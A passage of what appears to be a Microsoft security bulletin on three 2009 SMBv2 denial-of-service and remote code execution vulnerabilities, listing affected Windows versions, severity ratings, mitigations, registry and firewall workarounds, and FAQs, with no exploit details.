2*\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\n*Windows Server 2008 Server Core installation affected. For supported editions of Windows Server 2008, this update applies, with the same severity rating, whether or not Windows Server 2008 was installed using the Server Core installation option. For more information on this installation option, see Server Core. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008; see Compare Server Core Installation Options.\r\n\r\nNon-Affected Software\r\nOperating System\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\r\nWindows Server 2003 Service Pack 2\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\r\nWindows 7 for 32-bit Systems\r\n\r\nWindows 7 for x64-based Systems\r\n\r\nWindows Server 2008 R2 for x64-based Systems\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nDoes this update require the system to be restarted to take affect? \r\nIt is possible to update your system without restarting. To do this, you need to restart the Server SMB 2.x driver and all of the services that are dependent on this driver after applying the update. If this update is installed via automatic updates, you will be prompted to restart your system. However, the update may not notify you that a restart is required if you apply the update manually. Because the list of services can be quite long, we recommend restarting the system to ensure that the update is applied correctly.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. To determine the support life cycle for your software release, visit Microsoft Support Lifecycle.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit Microsoft Support Lifecycle. For more information about the extended security update support period for these software versions or editions, visit Microsoft Product Support Services.\r\n\r\nCustomers who require custom support for older releases must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit Microsoft Worldwide Information, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the October bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tSMBv2 Infinite Loop Vulnerability - CVE-2009-2526\tSMBv2 Command Value Vulnerability - CVE-2009-2532\tSMBv2 Negotiation Vulnerability - CVE-2009-3103\tAggregate Severity Rating\r\n\r\nWindows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\n*Windows Server 2008 Server Core installation affected. For supported editions of Windows Server 2008, this update applies, with the same severity rating, whether or not Windows Server 2008 was installed using the Server Core installation option. For more information on this installation option, see Server Core. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nSMBv2 Infinite Loop Vulnerability - CVE-2009-2526\r\n\r\nA denial of service vulnerability exists in the way that Microsoft Server Message Block (SMB) Protocol software handles specially crafted SMB version 2 (SMBv2) packets. An attempt to exploit the vulnerability would not require authentication, allowing an attacker to exploit the vulnerability by sending a specially crafted network message to a computer running the Server service. An attacker who successfully exploited this vulnerability could cause the computer to stop responding until restarted.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2009-2526.\r\n\t\r\nMitigating Factors for SMBv2 Infinite Loop Vulnerability - CVE-2009-2526\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nFirewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\n\u2022\t\r\n\r\nIn Windows Vista, if the network profile is set to "Public", the system is not affected by this vulnerability since unsolicited inbound network packets are blocked by default.\r\n\u2022\t\r\n\r\nThe Release to Manufacturing (RTM) versions of Windows 7 and Windows Server 2008 R2 are not affected by this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for SMBv2 Infinite Loop Vulnerability - CVE-2009-2526\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable SMB v2\r\n\r\nNote See Microsoft Knowledge Base Article 975517 to use the automated Microsoft Fix it solution to enable or disable this workaround.\r\n\r\nTo modify the registry key, perform the following steps:\r\n\r\nNote Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Regedit in the Open box, and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nLocate and then click the following registry subkey:\r\n\r\nHKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\r\n\r\n3.\r\n\t\r\n\r\nClick LanmanServer.\r\n\r\n4.\r\n\t\r\n\r\nClick Parameters.\r\n\r\n5.\r\n\t\r\n\r\nRight-click to add a new DWORD (32 bit) Value.\r\n\r\n6.\r\n\t\r\n\r\nEnter smb2 in the Name data field, and change the Value data field to 0.\r\n\r\n7.\r\n\t\r\n\r\nExit.\r\n\r\n8.\r\n\t\r\n\r\nRestart the "Server" service by performing one of the following:\r\n\r\n- Open up the computer management MMC, navigate to Services and Applications, click Services, right-click the Server service name and click Restart. Answer Yes in the pop-up menu.\r\n\r\n- From a command prompt and with administrator privileges, type net stop server and then net start server.\r\n\r\nImpact of workaround. The host will not communicate using SMBv2. Instead, the host will communicate using SMB 1.0. This should not impact basic services such as file and printer sharing. These will continue to function as normal.\r\n\r\nHow to undo the workaround:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Regedit in the Open box, and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nLocate and then click the following registry subkey:\r\n\r\nHKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\r\n\r\n3.\r\n\t\r\n\r\nClick LanmanServer.\r\n\r\n4.\r\n\t\r\n\r\nClick Parameters.\r\n\r\n5.\r\n\t\r\n\r\nDouble-click smb2, and change the Value data field to 1.\r\n\r\n6.\r\n\t\r\n\r\nExit.\r\n\r\n7.\r\n\t\r\n\r\nRestart the "Server" service by performing one of the following:\r\n\r\n- Open up the computer management MMC, navigate to Services and Applications, click Services, right-click the Server service name and click Restart. Answer Yes in the pop-up menu.\r\n\r\n- From a command prompt and with administrator privileges, type net stop server and then net start server.\r\n\u2022\t\r\n\r\nBlock TCP ports 139 and 445 at the firewall\r\n\r\nThese ports are used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft recommends that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, see TCP and UDP Port Assignments.\r\n\r\nImpact of Workaround: Several Windows services use the affected ports. Blocking connectivity to the ports may cause various applications or services to not function. Some of the applications or services that could be impacted are listed below:\r\n\u2022\t\r\n\r\nApplications that use SMB (CIFS)\r\n\u2022\t\r\n\r\nApplications that use mailslots or named pipes (RPC over SMB)\r\n\u2022\t\r\n\r\nServer (File and Print Sharing)\r\n\u2022\t\r\n\r\nGroup Policy\r\n\u2022\t\r\n\r\nNet Logon\r\n\u2022\t\r\n\r\nDistributed File System (DFS)\r\n\u2022\t\r\n\r\nTerminal Server Licensing\r\n\u2022\t\r\n\r\nPrint Spooler\r\n\u2022\t\r\n\r\nComputer Browser\r\n\u2022\t\r\n\r\nRemote Procedure Call Locator\r\n\u2022\t\r\n\r\nFax Service\r\n\u2022\t\r\n\r\nIndexing Service\r\n\u2022\t\r\n\r\nPerformance Logs and Alerts\r\n\u2022\t\r\n\r\nSystems Management Server\r\n\u2022\t\r\n\r\nLicense Logging Service\r\n\r\nHow to undo the workaround. Unblock TCP ports 139 and 445 at the firewall. For more information about ports, see TCP and UDP Port Assignments.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for SMBv2 Infinite Loop Vulnerability - CVE-2009-2526\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected system to stop responding until it is manually restarted. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the Microsoft Server Message Block (SMB) Protocol software insufficiently validating all fields when parsing specially crafted SMBv2 packets.\r\n\r\nWhat is Server Message Block Version 2 (SMBv2)? \r\nServer Message Block (SMB) is the file sharing protocol used by default on Windows-based computers. SMB Version 2.0 (SMBv2) is an update to this protocol, and is only supported on computers running Windows Server 2008, Windows 7, and Windows Vista. SMBv2 can only be used if both client and server support it. If either client or server cannot support SMBv2, the SMB 1.0 protocol will be used instead. The SMB protocol version to be used for file operations is decided during the negotiation phase. During the negotiation phase, a Windows Vista client advertises to the server that it can understand the new SMBv2 protocol. If the server (Windows Server 2008 or later) understands SMBv2, then SMBv2 is chosen for subsequent communication. Otherwise the client and server use SMB 1.0 and continue to function as normal. For more information on SMBv2, see MSDN article, Server Message Block (SMB) Version 2 Protocol Specification.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could cause a user's system to stop responding until manually restarted.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could try to exploit the vulnerability by creating a specially crafted SMBv2 packet and sending the packet to an affected system.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAll systems with SMB Server service are affected by this vulnerability. Domain controllers are at a greater risk for this vulnerability, as these systems have network shares open to all domain users by default.\r\n\r\nWhat does the update do? \r\nThe security update addresses the vulnerability by correctly validating the fields inside the SMBv2 packets.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nSMBv2 Command Value Vulnerability - CVE-2009-2532\r\n\r\nAn unauthenticated remote code execution vulnerability exists in the way that Microsoft Server Message Block (SMB) Protocol software handles specially crafted SMB packets. An attempt to exploit the vulnerability would not require authentication, allowing an attacker to exploit the vulnerability by sending a specially crafted network message to a computer running the Server service. An attacker who successfully exploited this vulnerability could take complete control of the system.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2009-2532.\r\n\t\r\nMitigating Factors for SMBv2 Command Value Vulnerability - CVE-2009-2532\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nFirewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\n\u2022\t\r\n\r\nIn Windows Vista, if the network profile is set to "Public", the system is not affected by this vulnerability since unsolicited inbound network packets are blocked by default.\r\n\u2022\t\r\n\r\nThe Release to Manufacturing (RTM) versions of Windows 7 and Windows Server 2008 R2 are not affected by this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for SMBv2 Command Value Vulnerability - CVE-2009-2532\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable SMB v2\r\n\r\nNote See Microsoft Knowledge Base Article 975517 to use the automated Microsoft Fix it solution to enable or disable this workaround.\r\n\r\nTo modify the registry key, perform the following steps:\r\n\r\nNote Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Regedit in the Open box, and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nLocate and then click the following registry subkey:\r\n\r\nHKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\r\n\r\n3.\r\n\t\r\n\r\nClick LanmanServer.\r\n\r\n4.\r\n\t\r\n\r\nClick Parameters.\r\n\r\n5.\r\n\t\r\n\r\nRight-click to add a new DWORD (32 bit) Value.\r\n\r\n6.\r\n\t\r\n\r\nEnter smb2 in the Name data field, and change the Value data field to 0.\r\n\r\n7.\r\n\t\r\n\r\nExit.\r\n\r\n8.\r\n\t\r\n\r\nRestart the "Server" service by performing one of the following:\r\n\r\n- Open up the computer management MMC, navigate to Services and Applications, click Services, right-click the Server service name and click Restart. Answer Yes in the pop-up menu.\r\n\r\n- From a command prompt and with administrator privileges, type net stop server and then net start server.\r\n\r\nImpact of workaround. The host will not communicate using SMBv2. Instead, the host will communicate using SMB 1.0. This should not impact basic services such as file and printer sharing. These will continue to function as normal.\r\n\r\nHow to undo the workaround:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Regedit in the Open box, and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nLocate and then click the following registry subkey:\r\n\r\nHKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\r\n\r\n3.\r\n\t\r\n\r\nClick LanmanServer.\r\n\r\n4.\r\n\t\r\n\r\nClick Parameters.\r\n\r\n5.\r\n\t\r\n\r\nDouble-click smb2, and change the Value data field to 1.\r\n\r\n6.\r\n\t\r\n\r\nExit.\r\n\r\n7.\r\n\t\r\n\r\nRestart the "Server" service by performing one of the following:\r\n\r\n- Open up the computer management MMC, navigate to Services and Applications, click Services, right-click the Server service name and click Restart. Answer Yes in the pop-up menu.\r\n\r\n- From a command prompt and with administrator privileges, type net stop server and then net start server.\r\n\u2022\t\r\n\r\nBlock TCP ports 139 and 445 at the firewall\r\n\r\nThese ports are used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft recommends that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, see TCP and UDP Port Assignments.\r\n\r\nImpact of Workaround: Several Windows services use the affected ports. Blocking connectivity to the ports may cause various applications or services to not function. Some of the applications or services that could be impacted are listed below:\r\n\u2022\t\r\n\r\nApplications that use SMB (CIFS)\r\n\u2022\t\r\n\r\nApplications that use mailslots or named pipes (RPC over SMB)\r\n\u2022\t\r\n\r\nServer (File and Print Sharing)\r\n\u2022\t\r\n\r\nGroup Policy\r\n\u2022\t\r\n\r\nNet Logon\r\n\u2022\t\r\n\r\nDistributed File System (DFS)\r\n\u2022\t\r\n\r\nTerminal Server Licensing\r\n\u2022\t\r\n\r\nPrint Spooler\r\n\u2022\t\r\n\r\nComputer Browser\r\n\u2022\t\r\n\r\nRemote Procedure Call Locator\r\n\u2022\t\r\n\r\nFax Service\r\n\u2022\t\r\n\r\nIndexing Service\r\n\u2022\t\r\n\r\nPerformance Logs and Alerts\r\n\u2022\t\r\n\r\nSystems Management Server\r\n\u2022\t\r\n\r\nLicense Logging Service\r\n\r\nHow to undo the workaround. Unblock TCP ports 139 and 445 at the firewall. For more information about ports, see TCP and UDP Port Assignments.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for SMBv2 Command Value Vulnerability - CVE-2009-2532\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the Microsoft Server Message Block (SMB) implementation not using the validated copy of the command value when handling SMB Multi-Protocol Negotiate Request packets.\r\n\r\nWhat is Server Message Block Version 2 (SMBv2)? \r\nServer Message Block (SMB) is the file sharing protocol used by default on Windows-based computers. SMB Version 2.0 (SMBv2) is an update to this protocol, and is only supported on computers running Windows Server 2008, Windows 7, and Windows Vista. SMBv2 can only be used if both client and server support it. If either client or server cannot support SMBv2, the SMB 1.0 protocol will be used instead. The SMB protocol version to be used for file operations is decided during the negotiation phase. During the negotiation phase, a Windows Vista client advertises to the server that it can understand the new SMBv2 protocol. If the server (Windows Server 2008 or later) understands SMBv2, then SMBv2 is chosen for subsequent communication. Otherwise the client and server use SMB 1.0 and continue to function as normal. For more information on SMBv2, see MSDN article, Server Message Block (SMB) Version 2 Protocol Specification.\r\n\r\nIs the Windows 7 Release Candidate (RC) release affected by this vulnerability? \r\nYes. This vulnerability was discovered after the release of Windows 7 Release Candidate. Customers running Windows 7 Release Candidate are encouraged to download and apply the update to their systems. The final versions of Windows 7 and Windows Server 2008 R2 are not affected by this vulnerability.\r\n\r\nSecurity updates are available from Microsoft Update and Windows Update. Security updates are also available from the Microsoft Download Center. You can find them most easily by doing a keyword search for "security update."\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could try to exploit the vulnerability by creating a specially crafted SMB packet and sending the packet to an affected system.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAll systems with the SMB Server service are affected by this vulnerability. Domain controllers are at a greater risk for this vulnerability, as these systems have network shares open to all domain users by default.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by correcting the way that SMB handles the command value in SMB packets.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nSMBv2 Negotiation Vulnerability - CVE-2009-3103\r\n\r\nAn unauthenticated remote code execution vulnerability exists in the way that Microsoft Server Message Block (SMB) Protocol software handles specially crafted SMB packets. An attempt to exploit the vulnerability would not require authentication, allowing an attacker to exploit the vulnerability by sending a specially crafted SMB packet to a computer running the Server service. An attacker who successfully exploited this vulnerability could take complete control of the system.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2009-3103.\r\n\t\r\nMitigating Factors for SMBv2 Negotiation Vulnerability - CVE-2009-3103\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nFirewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\n\u2022\t\r\n\r\nIn Windows Vista, if the network profile is set to "Public", the system is not affected by this vulnerability since unsolicited inbound network packets are blocked by default.\r\n\u2022\t\r\n\r\nThe Release to Manufacturing (RTM) versions of Windows 7 and Windows Server 2008 R2 are not affected by this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for SMBv2 Negotiation Vulnerability - CVE-2009-3103\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable SMB v2\r\n\r\nNote See Microsoft Knowledge Base Article 975517 to use the automated Microsoft Fix it solution to enable or disable this workaround.\r\n\r\nTo modify the registry key, perform the following steps:\r\n\r\nNote Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Regedit in the Open box, and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nLocate and then click the following registry subkey:\r\n\r\nHKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\r\n\r\n3.\r\n\t\r\n\r\nClick LanmanServer.\r\n\r\n4.\r\n\t\r\n\r\nClick Parameters.\r\n\r\n5.\r\n\t\r\n\r\nRight-click to add a new DWORD (32 bit) Value.\r\n\r\n6.\r\n\t\r\n\r\nEnter smb2 in the Name data field, and change the Value data field to 0.\r\n\r\n7.\r\n\t\r\n\r\nExit.\r\n\r\n8.\r\n\t\r\n\r\nRestart the "Server" service by performing one of the following:\r\n\r\n- Open up the computer management MMC, navigate to Services and Applications, click Services, right-click the Server service name and click Restart. Answer Yes in the pop-up menu.\r\n\r\n- From a command prompt and with administrator privileges, type net stop server and then net start server.\r\n\r\nImpact of workaround. The host will not communicate using SMBv2. Instead, the host will communicate using SMB 1.0. This should not impact basic services such as file and printer sharing. These will continue to function as normal.\r\n\r\nHow to undo the workaround:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Regedit in the Open box, and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nLocate and then click the following registry subkey:\r\n\r\nHKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\r\n\r\n3.\r\n\t\r\n\r\nClick LanmanServer.\r\n\r\n4.\r\n\t\r\n\r\nClick Parameters.\r\n\r\n5.\r\n\t\r\n\r\nDouble-click smb2, and change the Value data field to 1.\r\n\r\n6.\r\n\t\r\n\r\nExit.\r\n\r\n7.\r\n\t\r\n\r\nRestart the "Server" service by performing one of the following:\r\n\r\n- Open up the computer management MMC, navigate to Services and Applications, click Services, right-click the Server service name and click Restart. Answer Yes in the pop-up menu.\r\n\r\n- From a command prompt and with administrator privileges, type net stop server and then net start server.\r\n\u2022\t\r\n\r\nBlock TCP ports 139 and 445 at the firewall\r\n\r\nThese ports are used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft recommends that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, see TCP and UDP Port Assignments.\r\n\r\nImpact of Workaround: Several Windows services use the affected ports. Blocking connectivity to the ports may cause various applications or services to not function. Some of the applications or services that could be impacted are listed below:\r\n\u2022\t\r\n\r\nApplications that use SMB (CIFS)\r\n\u2022\t\r\n\r\nApplications that use mailslots or named pipes (RPC over SMB)\r\n\u2022\t\r\n\r\nServer (File and Print Sharing)\r\n\u2022\t\r\n\r\nGroup Policy\r\n\u2022\t\r\n\r\nNet Logon\r\n\u2022\t\r\n\r\nDistributed File System (DFS)\r\n\u2022\t\r\n\r\nTerminal Server Licensing\r\n\u2022\t\r\n\r\nPrint Spooler\r\n\u2022\t\r\n\r\nComputer Browser\r\n\u2022\t\r\n\r\nRemote Procedure Call Locator\r\n\u2022\t\r\n\r\nFax Service\r\n\u2022\t\r\n\r\nIndexing Service\r\n\u2022\t\r\n\r\nPerformance Logs and Alerts\r\n\u2022\t\r\n\r\nSystems Management Server\r\n\u2022\t\r\n\r\nLicense Logging Service\r\n\r\nHow to undo the workaround. Unblock TCP ports 139 and 445 at the firewall. For more information about ports, see TCP and UDP Port Assignments.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for SMBv2 Negotiation Vulnerability - CVE-2009-3103\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the Microsoft Server Message Block (SMB) implementation not appropriately parsing SMB packets.\r\n\r\nWhat is Server Message Block Version 2 (SMBv2)? \r\nServer Message Block (SMB) is the file sharing protocol used by default on Windows-based computers. SMB Version 2.0 (SMBv2) is an update to this protocol, and is only supported on computers running Windows Server 2008, Windows 7, and Windows Vista. SMBv2 can only be used if both client and server support it. If either client or server cannot support SMBv2, the SMB 1.0 protocol will be used instead. The SMB protocol version to be used for file operations is decided during the negotiation phase. During the negotiation phase, a Windows Vista client advertises to the server that it can understand the new SMBv2 protocol. If the server (Windows Server 2008 or later) understands SMBv2, then SMBv2 is chosen for subsequent communication. Otherwise the client and server use SMB 1.0 and continue to function as normal. For more information on SMBv2, see MSDN article, Server Message Block (SMB) Version 2 Protocol Specification.\r\n\r\nIs the Windows 7 Release Candidate (RC) release affected by this vulnerability? \r\nYes. This vulnerability was discovered after the release of Windows 7 Release Candidate. Customers running Windows 7 Release Candidate are encouraged to download and apply the update to their systems. The final versions of Windows 7 and Windows Server 2008 R2 are not affected by this vulnerability.\r\n\r\nSecurity updates are available from Microsoft Update and Windows Update. Security updates are also available from the Microsoft Download Center. You can find them most easily by doing a keyword search for "security update."\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could try to exploit the vulnerability by creating a specially crafted SMB packet and sending the packet to an affected system.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAll systems with the SMB Server service are affected by this vulnerability. Domain controllers are at a greater risk for this vulnerability, as these systems have network shares open to all domain users by default.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by correcting the way that SMB parses specially crafted SMB packets.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2009-3103.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nMatthieu Suiche of the Netherlands Forensics Institute for reporting the SMBv2 Command Value Vulnerability (CVE-2009-2532)\r\nTop of sectionTop of section\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web 